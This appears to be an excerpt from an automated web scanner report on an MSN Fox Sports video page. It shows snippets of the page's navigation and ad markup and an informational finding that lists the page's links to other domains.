<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
</script>

            <script type="text/javascript" src="http://Ads1.redacted/library/dap.js"></script>
...[SNIP]...
http://static.foxsports.com/cgi-bin/merge?files=/fe/css/story/story_tools.css,/fe/css/story/storyPage.css,/fe/css/multimediaCP.css&contentType=text/css&v=3_149_37" rel="stylesheet" type="text/css"/>

<script type="text/javascript" src="http://images.video.redacted/js/ch/Channels.js"></script>
<script type="text/javascript" language="javascript" src="http://images.video.redacted/flash/script/embed.js"></script>
<script type="text/javascript" src="http://s7.addthis.com/js/152/addthis_widget.js"></script>
<script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2275" name="cleanprintloader" ></script>
...[SNIP]...
<li>
<a href="http://www.speed.com/" title="Speed" class="speed" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Speed'});" target="_blank">SPEED</a>
...[SNIP]...
<li>
<a href="http://www.scout.com/" title="Scout" class="scout" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Scout'});" target="_blank">SCOUT</a>
...[SNIP]...
<li>
<a href="http://www.foxdeportes.com/" title="Deportes" class="deportes" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Deportes'});" target="_blank">DEPORTES</a>
...[SNIP]...
<li>
<a href="http://www.whatifsports.com" title="What If" class="what-if" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - What If'});" target="_blank">WHAT IF</a>
...[SNIP]...
<li>
<a href="http://fsr-pr.clearchannel.com" title="FOX Sports Radio" class="radio" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Fox Sports Radio'});" target="_blank">RADIO</a>
...[SNIP]...
<li>
<a href="http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav " title="Shop" class="shop" onclick="return true; fsAnalytics(this, {type: 'external', description: 'evergreennav - Shop'});" target="_blank">SHOP</a>
...[SNIP]...
<li><a href="http://www.bing.com/search" id="wslink">Search the Web</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=foxsports-nfl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/mlb-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://www.baseballamerica.com" target="_blank" title="Baseball America">Baseball America</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_mlb" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">


                                    <a href="http://www.ticketsnow.com/auto-racing-tickets/?partnerCode=16068" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
class="">

                                                        <a href="http://www.scenedaily.com/" target="_blank" title="Scene Daily">Scene Daily</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nascar" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/nba-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nba" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/nhl-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_nhl" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/college-football-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/Sports_Tickets/NCAA_Mens_College_Basketball_Tickets.html?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
class="">

                                                        <a href="http://foxsports.seenon.com/?v=fox-sports_ncaa" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="">


                                    <a href="http://foxsoccer.tv" title="FoxSoccer.tv">FoxSoccer.tv</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/golf-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.golfweek.com" target="_blank" title="Golfweek">Golfweek</a>
...[SNIP]...
li class="">


                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.ticketsnow.com/ultimate-fighting-championship-tickets/?partnerCode=16068" target="_blank" title="Tickets">Tickets</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://insidefights.com/" target="_blank" title="Inside Fights">Inside Fights</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.heavy.com/mma/ " target="_blank" title="HeavyMMA">HeavyMMA</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.thefightnetwork.com" target="_blank" title="Fight Network">Fight Network</a>
...[SNIP]...
p-down-off">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.speedtv.com" target="_blank" title="SPEED">SPEED</a>
...[SNIP]...
li class="">


                                                                    <a href="http://foxsports.seenon.com/" target="_blank" title="Shop">Shop</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="Odds/Results">Odds/Results</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.tvg.com/special/FoxSportsJumpPage_final.htm" target="_blank" title="TVG">TVG</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar" target="_blank" title="Race Replays">Race Replays</a>
...[SNIP]...
li class="">


                                                                    <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Race Series">Air Race Series</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Anaheim ">Anaheim </a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswest.com/" target="_blank" title="Los Angeles">Los Angeles</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouth.com/" target="_blank" title="Atlanta">Atlanta</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Memphis">Memphis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.nesn.com/" target="_blank" title="Boston">Boston</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Miami">Miami</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Charlotte">Charlotte</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Milwaukee">Milwaukee</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cincinnati">Cincinnati</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsnorth.com/" target="_blank" title="Minneapolis">Minneapolis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Cleveland">Cleveland</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportstennessee.com/" target="_blank" title="Nashville">Nashville</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsohio.com/" target="_blank" title="Columbus">Columbus</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Oklahoma City">Oklahoma City</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="Dallas">Dallas</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Orlando">Orlando</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsdetroit.com/" target="_blank" title="Detroit">Detroit</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsarizona.com/" target="_blank" title="Phoenix">Phoenix</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportswisconsin.com/" target="_blank" title="Green Bay">Green Bay</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportscarolinas.com/" target="_blank" title="Raleigh">Raleigh</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportshouston.com/" target="_blank" title="Houston">Houston</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportssouthwest.com/" target="_blank" title="San Antonio">San Antonio</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="Indianapolis">Indianapolis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsmidwest.com/" target="_blank" title="St. Louis">St. Louis</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportskansascity.com/" target="_blank" title="Kansas City">Kansas City</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.foxsportsflorida.com/" target="_blank" title="Tampa">Tampa</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.yardbarker.com/rumors" target="_blank" title="Rumors">Rumors</a>
...[SNIP]...
<li class="">

                                                           <a href="http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596" target="_blank" title="Air Racing">Air Racing</a>
...[SNIP]...
<li class="">

                                                           <a href="http://foxsports.seenon.com/?ecid=PRF-SM-500012&PA=FoxSportNav2" target="_blank" title="Shop">Shop</a>
...[SNIP]...
<li class="msn-logo"><a href="http://redacted" class="out-link msn sprite" title="go to redacted"><span>
...[SNIP]...
<li>
               <a href="http://entertainment.redacted/" class="out-link" title="Entertainment">Entertainment</a>
...[SNIP]...
<li class="first" title="eEntertainment"><a href="http://wonderwall.redacted/" title="Celebrities">Celebrities</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://thebubble.redacted/ " title="Comedy">Comedy</a></li>
<li class="" title="eEntertainment"><a href="http://entertainment.redacted/news/?ipp=15" title="Entertainment News ">Entertainment News </a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://zone.redacted/en-us/home" title="Games">Games</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/" title="Movies">Movies</a></li>
<li class="" title="eEntertainment"><a href="http://music.msn.com/" title="Music">Music</a></li>
<li class="" title="eEntertainment"><a href="http://movies.msn.com/new-on-dvd/movies/" title="New on DVD">New on DVD</a>
...[SNIP]...
<li class="" title="eEntertainment"><a href="http://tv.redacted/" title=" TV"> TV</a></li>
<li class="last" title="eEntertainment"><a href="http://entertainment.redacted/video/?from=en-us_msnhp" title=" Video"> Video</a>
...[SNIP]...
<li>
   <a href="http://moneycentral.redacted/home.asp" class="out-link" title="Money">Money</a>
...[SNIP]...
<li class="first" title="money"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="money"><a href="http://www.msnbc.redacted/id/3032072/ns/business" title="Business News">Business News</a>
...[SNIP]...
<li class="" title="money"><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home" title="Careers & Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="money"><a href="http://money.msn.com/investing" title="Investing">Investing</a></li>
<li class="" title="money"><a href="http://money.msn.com/personal-finance" title="Personal Finance">Personal Finance</a>
...[SNIP]...
<li class="" title="money"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="money"><a href="http://realestate.redacted/" title="Real Estate & Rentals">Real Estate & Rentals</a>
...[SNIP]...
<li class="last" title="money"><a href="http://money.msn.com/money-video" title="Video">Video</a>
...[SNIP]...
<li>
   <a href="http://lifestyle.redacted/default.aspx" class="out-link" title="Lifestyle">Lifestyle</a>
...[SNIP]...
<li class="first" title="lifestyle"><a href="http://lifestyle.redacted/your-look/" title="Beauty & Fashion">Beauty & Fashion</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.delish.com/" title=" Cooking"> Cooking</a></li>
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/your-home/" title="Decor & Organizing">Decor & Organizing</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://fitbie.msn.com" title="Fitbie">Fitbie</a></li>
<li class="" title="lifestyle"><a href="http://glo.redacted/" title="Glo: For Her">Glo: For Her</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://health.msn.com/" title="Health">Health</a></li>
<li class="" title="lifestyle"><a href="http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://lifestyle.redacted/relationships/" title="Love & Relationships">Love & Relationships</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670269" title="Online Dating">Online Dating</a>
...[SNIP]...
<li class="" title="lifestyle"><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV " title=" Travel"> Travel</a></li>
<li class="last" title="lifestyle"><a href="http://lifestyle.redacted/your-look/video/?from=en-us_msnhp" title="Video">Video</a>
...[SNIP]...
<li id="msn-more">
   <a href="http://specials.msn.com/alphabet.aspx " class="msn-more" title="More">More</a>
...[SNIP]...
<li class="first" title="more"><a href="http://autos.msn.com/" title="Autos">Autos</a></li>
<li class="" title="more"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV" title="Maps & Directions">Maps & Directions</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/videos/browse?from=en-us_msnhp" title="Video">Video</a></li>
<li class="" title="more"><a href="http://careers.msn.com/" title="Careers & Jobs">Careers & Jobs</a>
...[SNIP]...
<li class="" title="more"><a href="http://my.redacted/" title="My MSN">My MSN</a></li>
<li class="" title="more"><a href="http://local.msn.com/weather.aspx" title="Weather">Weather</a></li>
<li class="" title="more"><a href="http://insidemsn.wordpress.com" title="Corrections & Clarifications">Corrections & Clarifications</a>
...[SNIP]...
<li class="" title="more"><a href="http://dating.msn.com/index.aspx?TrackingID=516163&BannerID=670268" title="Personals">Personals</a></li>
<li class="" title="more"><a href="http://msn.whitepages.com/" title="White Pages">White Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.delish.com/" title="Delish">Delish</a></li>
<li class="" title="more"><a href="http://investing.money.redacted/investments/stock-price" title="Quotes">Quotes</a></li>
<li class="" title="more"><a href="http://wonderwall.redacted/" title="Wonderwall">Wonderwall</a>
...[SNIP]...
<li class="" title="more"><a href="http://games.msn.com/" title="Games Preview">Games Preview</a>
...[SNIP]...
<li class="" title="more"><a href="http://realestate.redacted/" title="Real Estate/Rentals">Real Estate/Rentals</a>
...[SNIP]...
<li class="" title="more"><a href="http://yellowpages.redacted/" title="Yellow Pages">Yellow Pages</a>
...[SNIP]...
<li class="" title="more"><a href="http://astrocenter.astrology.redacted" title="Horoscopes">Horoscopes</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/shopping?FORM=SHOPH2" title="Shopping">Shopping</a></li>
<li class="" title="more"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" title="Feedback">Feedback</a></li>
<li class="" title="more"><a href="http://local.msn.com/news.aspx" title="Local Edition">Local Edition</a>
...[SNIP]...
<li class="" title="more"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV " title="Travel">Travel</a></li>
<li class="last" title="more"><a href="http://specials.msn.com/alphabet.aspx" title="Full MSN Index">Full MSN Index</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?FORM=FOXSP" class="bing-link" title="Bing">Bing</a>
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportswisconsin.com/msn/01/28/11/Lessons-learned-from-last-Steelers-game/landing.html?blockID=399673&feedID=5059' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Hard lessons');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Hard lessons') });location.href=this.href;">
<div id="blurb_2" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsflorida.com/msn/01/29/11/Nations-coolest-cities-have-many-of-NBAs/landing_reiter.html?blockID=400120&feedID=3722' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Run this town');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Run this town') });location.href=this.href;">
<div id="blurb_4" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportswisconsin.com/msn/01/27/11/Dance-the-Raji/landing.html?blockID=399089&feedID=5059' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Dance party');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Dance party') });location.href=this.href;">
<div id="blurb_5" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportsflorida.com/msn/01/28/11/Lack-of-trust-not-lack-of-Bosh-hurts-mos/landing_reiter.html?blockID=399356&feedID=7926' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Not a pretty sight');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Not a pretty sight') });location.href=this.href;">
<div id="blurb_6" align="left" class="blurb">
...[SNIP]...
<div class="itemWrapper">
<a class='item' href='http://www.foxsportstennessee.com/msn/01/27/11/Fisher-and-the-Future/landing_titans.html?blockID=399272&feedID=3732' title="" onmouseover="if(this.title=='')this.title=unscapeHTML('Rare breed');" onclick="javascript:fsAnalytics(this, {description: 'tombstone - clickthrough - ' + unscapeHTML('Rare breed') });location.href=this.href;">
<div id="blurb_7" align="left" class="blurb">
...[SNIP]...
<div class="fs-tune-in">


           <a href="http://itunes.apple.com/us/app/fox-sports-mobile/id294056623?mt=8#ls=1"><img src="http://static.foxsports.com/content/fscom/img/2010/12/14/300x90_20101214192718571_0_0.JPG" alt=""/>
...[SNIP]...
</div>

<a href="http://g.redacted/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=8b302292-7bc5-49bb-b20a-bb7df387c2b7&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=4f106944-1cfe-48f1-a72b-63a31c206d93&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=4f106944-1cfe-48f1-a72b-63a31c206d93&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=98be1890-ccd5-45aa-b1cc-b3c896e10a15&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=07820735-2940-48f9-aced-02c46e9a76b5&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=07820735-2940-48f9-aced-02c46e9a76b5&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<a href='http://msn.foxsports.com/video/NHL?vid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&from=foxsports/nhl/stories'><img src="http://img5.catalog.video.redacted/image.aspx?uuid=bb344e55-7387-4d4c-bc39-9a98ab9968ec&w=136&h=102" height="69" width="92" /></a>
...[SNIP]...
<div class="body">
<a title="Video: Who makes the tastiest frozen pizza?" class="main-story" href="http://www.bing.com/videos/watch/video/tastiest-frozen-pizza/q94x07p0?q=Pizza&rel=msn&from=en-us_msnhp&form=MSNXNM&ocid=xnetr4-1"><img alt="Frozen Pizza, c. Rubberball - Mike Kemp - Getty Images" border="0" height="90" width="90" src="http://blstb.redacted/i/59/A38490AFABAE7E3D494E8243D8FE6.jpg"><span class="copy">
...[SNIP]...
<li>
<a title="Bing: Air Force sex conviction" href="http://www.bing.com/search?q=air+force+chief+convicted+sexual+harassment&form=MSNXNM&ocid=xnetr4-2">Bing: Air Force sex conviction</a>
...[SNIP]...
<li>
<a title="PETA's new naked celeb" href="http://specials.msn.com/A-List/Entertainment/PETAs-newest-naked-celeb.aspx?cp-documentid=27450762&form=MSNXNM&ocid=xnetr4-3">PETA's new naked celeb</a>
...[SNIP]...
<li>
<a title="What's playing at the movies?" href="http://www.bing.com/entertainment/movies?form=MSNXNM&ocid=xnetr4-4">What's playing at the movies?</a>
...[SNIP]...
</div>

<a href="http://g.redacted/AIPRIV/en-us" target="_blank" style="float: right;*margin-bottom: 5px;" id="adChoices"><img src="http://blstc.redacted/br/chan/css/decoration/adchoicesv4.png"/></a>
...[SNIP]...
<h3>
                   <a href="http://www.ticketsnow.com/nhl-tickets/" target="_blank" title="NHL Tickets">NHL Tickets</a>
...[SNIP]...
<h3>
                   <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<h3>
                   <a href="http://www.newscorp.com" title="News Corp.">News Corp.</a>
...[SNIP]...
<h3>
                   <a href="http://www.fox.com" title="FOX">FOX</a>
...[SNIP]...
<h3>
                   <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...
<h3>
                   <a href="http://www.fxnetworks.com" title="FX">FX</a>
...[SNIP]...
<h3>
                   <a href="http://www.speedtv.com" title="Speed TV">Speed TV</a>
...[SNIP]...
<h3>
                   <a href="http://www.fuel.tv" title="NCAAFuel TV">Fuel TV</a>
...[SNIP]...
<li>
                       <a href="http://www.foxcareers.com" title="Jobs">Jobs</a></li>
                   <li>
                       <a href="http://surveys2.researchresults.com/192/0030/1920030.htm?l=1" title="Join Our Opinion Panel">Join Our Opinion Panel</a>
...[SNIP]...
<li>
                       <a href="http://www.fox.com" title="FOX.com">FOX.com</a>
...[SNIP]...
<li>
                       <a href="http://www.foxnews.com" title="FOX News">FOX News</a>
...[SNIP]...
<li>
                       <a href="http://www.newscorp.com" title="News Corp">News Corp.</a>
...[SNIP]...
<li class="last">
                       <a href="http://www.foxsportssupports.com" title="FOX Sports Supports">FOX Sports Supports</a>
...[SNIP]...

<script language="javascript" src="http://b.scorecardresearch.com/beacon.js" type="text/javascript"></script>
...[SNIP]...
<noscript>
<img src="http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1" style="display:none" width="0" height="0" alt="" />
</noscript>
...[SNIP]...
<li><a target="_blank" href="http://go.microsoft.com/fwlink/?LinkId=74170" title="MSN Privacy">MSN Privacy</a>
...[SNIP]...
<li><a target="_blank" href="http://g.redacted/0TO_/enus" title="Legal">Legal</a>
...[SNIP]...
<li><a target="_blank" href="http://advertising.redacted/home/home.asp" title="Advertise">Advertise</a>
...[SNIP]...
<li><a target="_blank" href="http://rss.redacted/" title="RSS">RSS</a>
...[SNIP]...
<li><a href="http://g.redacted/AIPRIV/en-us">About our ads</a>
...[SNIP]...

22.241. http://msn.foxsports.com/video previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://msn.foxsports.com
Path:	/video

Issue detail

The page was loaded from a URL containing a query string:

http://msn.foxsports.com/video?from=en-us_msnhp

The response contains the following links to other domains:

http://ads1.redacted/library/dap.js
http://advertising.msn.com/home/home.asp
http://astrocenter.astrology.redacted/
http://astrocenter.astrology.redacted/msn/DeptHoroscope.aspx?When=0&Af=-1000&VS
http://autos.redacted/
http://b.scorecardresearch.com/b?c1=2&c2=3000001&c3=&c4=&c5=&c6=&c15=&cv=1.3&cj=1
http://b.scorecardresearch.com/beacon.js
http://careers.redacted/
http://cdn.gigya.com/JS/socialize.js?apikey=2_0mDflAmB2Uw-8uIvNcQDq7cV0-R4xz_-VK9rOU18T-Jc_50uceVqQUddE55Vkw25
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670268
http://dating.redacted/index.aspx?TrackingID=516163&BannerID=670269
http://entertainment.msn.com/
http://entertainment.msn.com/news/?ipp=15
http://entertainment.msn.com/video/?from=en-us_msnhp
http://fitbie.redacted/
http://foxsoccer.tv/
http://foxsports.seenon.com/
http://foxsports.seenon.com/?ecid=PRF-SM-500003&PA=FoxSportNav
http://foxsports.seenon.com/?ecid=PRF-SM-500012&PA=FoxSportNav2
http://foxsports.seenon.com/?v=fox-sports_mlb
http://foxsports.seenon.com/?v=fox-sports_nascar
http://foxsports.seenon.com/?v=fox-sports_nba
http://foxsports.seenon.com/?v=fox-sports_ncaa
http://foxsports.seenon.com/?v=fox-sports_nhl
http://foxsports.seenon.com/?v=foxsports-nfl
http://fsr-pr.clearchannel.com/
http://g.redacted/0TO_/enus
http://g.redacted/AIPRIV/en-us
http://games.redacted/
http://glo.redacted/
http://go.microsoft.com/fwlink/?LinkId=74170
http://health.redacted/
http://images.video.msn.com/js/vp.js
http://img.widgets.video.s-redacted/js/embed.js
http://insidefights.com/
http://insidemsn.wordpress.com/
http://investing.money.redacted/investments/stock-price
http://lifestyle.redacted/default.aspx
http://lifestyle.redacted/relationships/
http://lifestyle.redacted/your-home/
http://lifestyle.redacted/your-look/
http://lifestyle.redacted/your-look/video/?from=en-us_msnhp
http://local.redacted/news.aspx
http://local.redacted/weather.aspx
http://money.redacted/investing
http://money.redacted/money-video
http://money.redacted/personal-finance
http://moneycentral.msn.com/home.asp
http://movies.redacted/
http://movies.redacted/new-on-dvd/movies/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://redacted/
http://msn.whitepages.com/
http://music.redacted/
http://my.redacted/
http://realestate.redacted/
http://rss.redacted/
http://specials.redacted/alphabet.aspx
http://surveys2.researchresults.com/192/0030/1920030.htm?l=1
http://thebubble.redacted/
http://tv.redacted/
http://wonderwall.redacted/
http://www.baseballamerica.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/search
http://www.bing.com/search?FORM=FOXSP
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.delish.com/
http://www.fox.com/
http://www.foxcareers.com/
http://www.foxdeportes.com/
http://www.foxnews.com/
http://www.foxsportsarizona.com/
http://www.foxsportscarolinas.com/
http://www.foxsportsdetroit.com/
http://www.foxsportsflorida.com/
http://www.foxsportshouston.com/
http://www.foxsportskansascity.com/
http://www.foxsportsmidwest.com/
http://www.foxsportsnorth.com/
http://www.foxsportsohio.com/
http://www.foxsportssouth.com/
http://www.foxsportssouthwest.com/
http://www.foxsportssupports.com/
http://www.foxsportstennessee.com/
http://www.foxsportswest.com/
http://www.foxsportswisconsin.com/
http://www.fuel.tv/
http://www.fxnetworks.com/
http://www.golfweek.com/
http://www.heavy.com/mma/
http://www.msnbc.redacted/id/3032072/ns/business
http://www.nesn.com/
http://www.newscorp.com/
http://www.racereplays.com/foxsports/index.cfm?start=ws_foxsports.com_navbar
http://www.redbullairrace.com/cs/Satellite/en_air/Official-Red-Bull-Air-Race-Homepage/001238611393596
http://www.scenedaily.com/
http://www.scout.com/
http://www.speed.com/
http://www.speedtv.com/
http://www.thefightnetwork.com/
http://www.ticketexchangebyticketmaster.com/NFL/?partnerCode=16068
http://www.ticketexchangebyticketmaster.com/NFL/default.aspx
http://www.ticketsnow.com/
http://www.ticketsnow.com/Sports_Tickets/NCAA_Mens_College_Basketball_Tickets.html?partnerCode=16068
http://www.ticketsnow.com/auto-racing-tickets/?partnerCode=16068
http://www.ticketsnow.com/college-football-tickets/
http://www.ticketsnow.com/college-football-tickets/?partnerCode=16068
http://www.ticketsnow.com/golf-tickets/?partnerCode=16068
